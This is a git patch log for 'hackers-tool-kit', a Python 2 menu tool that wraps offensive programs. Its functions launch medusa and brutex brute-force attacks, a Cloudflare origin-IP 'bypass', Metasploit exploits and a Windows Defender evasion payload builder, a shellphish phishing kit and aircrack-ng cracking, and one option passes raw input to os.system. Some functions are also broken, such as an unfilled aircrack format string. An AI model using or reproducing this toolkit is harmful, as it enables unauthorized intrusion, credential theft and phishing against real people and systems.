len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +def terminal(): + os.system("gnome-terminal") +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + found = True +mainbanner() +main() From f7cd0578205ef3cf86ff466676594415eeaed245 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 21:30:03 +0100 Subject: [PATCH 073/214] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 553a625..7f502c5 100644 --- a/README.md +++ b/README.md @@ -36,10 +36,10 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates -* added a connect option - * changed some things in the myip and sysinfo options * updated arpspoof option * added a open new terminal option + +* added aircrack-ng automated option From 952551b0d7eb6c3538563c522e47fbd53b9b56fb Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 30 Mar 2019 16:26:01 +0100 Subject: [PATCH 074/214] Delete htk.py --- htk.py | 2041 -------------------------------------------------------- 1 file changed, 2041 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 88b69a3..0000000 --- a/htk.py +++ /dev/null @@ -1,2041 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - 